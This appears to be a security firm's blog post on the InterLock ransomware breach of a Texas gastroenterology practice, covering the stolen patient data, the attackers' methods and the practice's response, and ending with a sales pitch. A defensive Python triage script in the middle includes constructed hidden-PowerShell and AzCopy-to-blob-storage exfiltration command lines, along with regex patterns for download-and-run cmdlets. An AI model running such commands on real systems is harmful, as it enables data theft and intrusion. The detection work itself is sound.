
Texas Digestive Specialists Hit by Major InterLock Ransomware Attack
Texas Gastroenterology Practice Suffers Major InterLock Ransomware Attack – Patient Information Potentially Compromised
The healthcare sector continues to face relentless cyberattacks, with the latest victim being Texas Digestive Specialists, a prominent gastroenterology practice serving the Rio Grande Valley. In late May 2025, the InterLock ransomware group successfully infiltrated the organization’s network, potentially compromising the sensitive personal and medical information of 41,521 patients. This attack serves as yet another stark reminder of how cybercriminals specifically target healthcare organizations, knowing that patient care dependencies often pressure victims into paying ransoms quickly.
What Happened in the Texas Digestive Specialists Breach
Texas Digestive Specialists, formerly known as Gastroenterology Consultants of South Texas, operates multiple facilities across Harlingen, Brownsville, and McAllen, providing comprehensive gastroenterology services to patients throughout South Texas. In late May 2025, this trusted healthcare provider became the victim of a sophisticated cyberattack that would compromise the sensitive information of over 41,000 patients.
- Initial Compromise: The InterLock ransomware group gained unauthorized access to the practice’s network systems, bypassing existing security measures through advanced social engineering techniques
- Double-Extortion Strategy: The cybercriminals employed a two-pronged attack approach, first exfiltrating massive amounts of patient data before deploying ransomware to encrypt the practice’s systems
- Massive Data Theft: Security researchers confirmed that InterLock stole approximately 263 GB of sensitive information, comprising over 215,000 individual files stored in more than 16,900 folders
- Comprehensive Patient Data Exposure: The stolen information included patient names, Social Security numbers, dates of birth, addresses, medical records, health insurance details, testing dates, relevant medical histories, clinical findings, and detailed pathology reports
- Extended Timeline: The compromised data spanned from August 2023 to early 2025, representing nearly two years of sensitive patient information
- Delayed Discovery: The practice didn’t detect the breach until weeks after the initial compromise, allowing criminals extended access to patient systems and data
This attack demonstrates how quickly sophisticated cybercriminals can penetrate healthcare networks and extract vast amounts of sensitive information before detection, highlighting the critical need for advanced monitoring and rapid response capabilities in medical practice cybersecurity.
Severity and Scope of the Attack
This breach ranks as a high-severity incident due to both the volume of affected individuals and the extremely sensitive nature of the compromised data. With 41,521 patients potentially impacted, this attack affects a significant portion of the Rio Grande Valley’s population who sought gastroenterology care from the practice.
The severity becomes even more concerning when considering the types of medical information exposed. Gastroenterology records often contain particularly sensitive details about digestive health issues, colorectal procedures, weight management treatments, and other private medical conditions that patients would never want publicly disclosed. The combination of personally identifiable information with detailed protected health information creates a perfect storm for identity theft, medical fraud, and potential blackmail scenarios.
The attack’s scope extends beyond immediate patient data compromise:
- Financial records and insurance information enable sophisticated fraud schemes
- Complete medical histories allow criminals to impersonate patients for prescription fraud
- Detailed pathology reports could be used for targeted harassment or blackmail
- Social Security numbers provide pathways to comprehensive identity theft
How InterLock Executes Their Attacks
The InterLock ransomware group has demonstrated sophisticated attack methodologies that make it particularly dangerous to healthcare organizations. The group typically begins its attacks through drive-by compromise techniques, where it either compromises existing legitimate websites or creates convincing phishing domains designed to distribute malicious software disguised as popular application updates.
The group has recently evolved their tactics to include the ClickFix social engineering technique, which tricks victims into executing malicious PowerShell commands by presenting fake error messages or security alerts that appear to require user action to resolve. Once victims copy and paste these malicious commands, InterLock gains initial access to their systems.
After establishing initial access, InterLock deploys a sophisticated arsenal of tools for reconnaissance and lateral movement:
- Custom Remote Access Trojans (RATs) for persistent command and control
- Credential stealing malware including LummaStealer and BerserkStealer
- Keyloggers to capture additional authentication credentials
- PowerShell backdoors for maintaining persistent access
- Azure Storage Explorer and AzCopy tools for data exfiltration to cloud storage
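A defender can look for two of the behaviours described above in process-creation telemetry: PowerShell started by a user paste, and AzCopy pushing data to Azure Blob Storage from a host with no sanctioned reason to do so. The following is an added example, not code from the original article or from any agency advisory. The event records, host names, rule names and allowlist are constructed, and the ClickFix rule assumes the pasted command is launched from the Windows Run dialog, which makes explorer.exe the parent process.

```python
import re

# Constructed process-creation records, reduced to the fields an EDR or
# Sysmon-style export would provide. Hosts and paths are illustrative only.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"host": "FRONTDESK-01", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <PLACEHOLDER>"},
    {"host": "IT-ADMIN-02", "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmd": r"powershell.exe -File C:\Scripts\rotate-logs.ps1"},
    {"host": "EHR-FS-01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\azcopy.exe",
     "cmd": r"azcopy.exe copy D:\Records https://<ACCOUNT>.blob.core.windows.net/<CONTAINER>?<SAS> --recursive"},
    {"host": "BACKUP-01", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Tools\azcopy.exe",
     "cmd": r"azcopy.exe sync E:\Backups https://<ACCOUNT>.blob.core.windows.net/<CONTAINER>?<SAS>"},
]

# Assumption: the only host with an approved AzCopy job in this environment.
AZCOPY_ALLOWED_HOSTS = {"BACKUP-01"}

# Hidden window, encoded command, or download-and-run cmdlets on the command line.
SUSPICIOUS_PS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(nc(odedcommand)?)?\s|\bi(ex|wr)\b"
    r"|invoke-(expression|webrequest)|downloadstring", re.I)
# AzCopy copy/sync whose command line references an Azure Blob Storage endpoint.
BLOB_UPLOAD = re.compile(r"\b(copy|sync)\b.*\.blob\.core\.windows\.net", re.I)

def basename(path):
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def triage(events, azcopy_allowed=AZCOPY_ALLOWED_HOSTS):
    """Return (host, rule) pairs for events matching either heuristic."""
    findings = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent"])
        if (image in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe"
                and SUSPICIOUS_PS.search(ev["cmd"])):
            findings.append((ev["host"], "clickfix-style-powershell"))
        if (image == "azcopy.exe" and BLOB_UPLOAD.search(ev["cmd"])
                and ev["host"] not in azcopy_allowed):
            findings.append((ev["host"], "unsanctioned-azcopy-upload"))
    return findings

if __name__ == "__main__":
    for host, rule in triage(EVENTS):
        print(f"{host}: {rule}")
```

Both rules are triage heuristics: a renamed AzCopy binary or a differently launched PowerShell session will not match, so they complement rather than replace egress monitoring of cloud storage endpoints.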
The group demonstrates particular expertise in targeting virtualized environments, with their ransomware specifically designed to encrypt virtual machines across both Windows and Linux operating systems. This approach allows them to cause maximum disruption to modern healthcare IT infrastructures that rely heavily on virtualization technologies.
The Criminal Organization Behind the Attack
InterLock represents a new generation of sophisticated cybercriminal organizations that have emerged to exploit the growing digital dependencies of healthcare providers and other critical infrastructure sectors. This ransomware group first appeared on the cybercrime scene in September 2024 and has quickly established itself as a formidable threat to organizations across North America and Europe.
- Centralized Operations: Unlike many ransomware groups that operate as Ransomware-as-a-Service (RaaS) operations, InterLock appears to function as a more centralized organization without actively recruiting external affiliates, allowing for tighter operational control
- Opportunistic Targeting: The group demonstrates clear financial motivations, selecting victims based on opportunity rather than specific ideological goals, with a particular focus on organizations likely to pay ransoms quickly due to operational dependencies
- Healthcare Specialization: Federal agencies have identified InterLock’s preference for attacking healthcare and public health sector organizations, recognizing that patient care disruptions create urgent pressure to restore systems rapidly
- Professional Infrastructure: The group maintains sophisticated operations including a dark web data leak site called “Worldwide Secrets Blog” where they publish stolen data from victims who refuse to pay ransoms
- Secure Communication Methods: InterLock provides victims with unique identification codes and directs them to negotiate through secure Tor browser connections, demonstrating advanced understanding of operational security
- Government Recognition: The FBI, CISA, and Department of Health and Human Services have specifically identified InterLock as an active threat to critical infrastructure across multiple sectors
The emergence of groups like InterLock represents an evolution in ransomware operations, where cybercriminals combine technical sophistication with strategic targeting to maximize their success rates against organizations that can least afford extended downtime.
Who Is at Risk
The Texas Digestive Specialists breach puts multiple groups at significant risk, extending far beyond the immediate patient population. Current and former patients who received care from the practice between August 2023 and early 2025 face the highest risk, as their comprehensive medical and personal information has been completely exposed.
Patients are at risk for several types of malicious activity:
- Medical identity theft where criminals use patient information to obtain fraudulent prescriptions or medical services
- Financial fraud through insurance manipulation and billing scams
- Targeted phishing attacks that leverage knowledge of specific medical conditions or recent procedures
- Blackmail attempts using sensitive gastroenterology findings or weight management information
- Comprehensive identity theft using exposed Social Security numbers and demographic data
Healthcare providers and staff at Texas Digestive Specialists also face risks, as employee information may have been included in the data theft. The practice itself confronts significant regulatory penalties, potential lawsuits, and long-term reputational damage that could impact their ability to maintain patient trust and operational viability.
The broader healthcare community should view this attack as a warning about InterLock’s specific targeting of medical practices. The group’s demonstrated capability to penetrate healthcare networks and their preference for targeting this sector suggests that other medical practices, particularly smaller organizations with limited cybersecurity resources, remain at elevated risk for similar attacks.
Remediation and Response Measures
Texas Digestive Specialists has implemented multiple response strategies to address the breach and protect affected patients, though the effectiveness of these measures has been limited by significant delays in detection and disclosure. The practice’s response efforts demonstrate both the challenges healthcare organizations face when responding to sophisticated cyberattacks and the critical importance of having incident response plans in place before attacks occur.
- Immediate Investigation: The practice launched a comprehensive investigation with assistance from leading cybersecurity specialists to determine the full scope of the compromise and implement additional security measures
- Multi-Channel Notifications: The organization provided notification to all affected individuals through direct mail, media announcements, and a dedicated website explaining the incident details
- Credit Protection Services: Texas Digestive Specialists offered complimentary credit monitoring and identity theft protection services through TransUnion for all impacted patients
- Regulatory Reporting: The breach was officially disclosed to the Texas Attorney General’s office on July 24, 2025, fulfilling legal notification requirements
- Enhanced Security Implementation: The practice indicated they are implementing additional cybersecurity measures, though specific details about these improvements have not been publicly disclosed
- Patient Support Resources: Affected individuals received guidance on protective actions including credit freezes, insurance monitoring, and fraud reporting procedures
The delayed disclosure timeline raises serious concerns about response effectiveness, as the attack occurred in late May 2025 but patient notifications were not issued until late July 2025, creating a dangerous two-month window where affected individuals were unaware of their exposure and unable to take protective measures.
How CinchOps Can Help Secure Your Business
As a leading managed services provider specializing in cybersecurity for small and medium-sized businesses, CinchOps understands the unique challenges facing healthcare practices and other organizations targeted by sophisticated ransomware groups like InterLock. Our comprehensive approach to cybersecurity combines advanced threat detection with practical security implementations designed specifically for businesses that need enterprise-level protection without enterprise-level complexity.
CinchOps provides multi-layered defense strategies specifically designed to prevent ransomware attacks before they can compromise your systems:
- Advanced Email Security and Anti-Phishing Protection – Our enterprise-grade email filtering systems block malicious attachments and links before they reach your users, while our comprehensive user training programs teach your staff to recognize and report social engineering attempts like ClickFix attacks
- Endpoint Detection and Response (EDR) – We deploy sophisticated monitoring solutions that detect unusual activity patterns, credential theft attempts, and unauthorized network access in real-time, stopping attacks before they can spread throughout your network
- Network Segmentation and Access Controls – Our team implements proper network architecture to limit lateral movement opportunities, ensuring that even if attackers gain initial access, they cannot easily spread to critical systems containing sensitive patient data
- Regular Security Assessments and Vulnerability Management – We conduct comprehensive security evaluations to identify and remediate potential attack vectors before cybercriminals can exploit them, including assessments of your virtual infrastructure that InterLock specifically targets
- Backup and Disaster Recovery Solutions – Our robust backup strategies ensure that your critical data remains accessible even during a ransomware attack, reducing the pressure to pay ransom demands while maintaining operational continuity
- 24/7 Security Monitoring and Incident Response – Our security operations center provides around-the-clock monitoring for threats, with immediate response capabilities to contain and neutralize attacks before they can cause significant damage
Don’t wait until your organization becomes the next victim of a sophisticated ransomware attack. Contact CinchOps today to schedule a comprehensive security assessment and learn how our managed cybersecurity services can protect your business from threats like InterLock ransomware while ensuring you can focus on serving your customers rather than worrying about cybersecurity threats.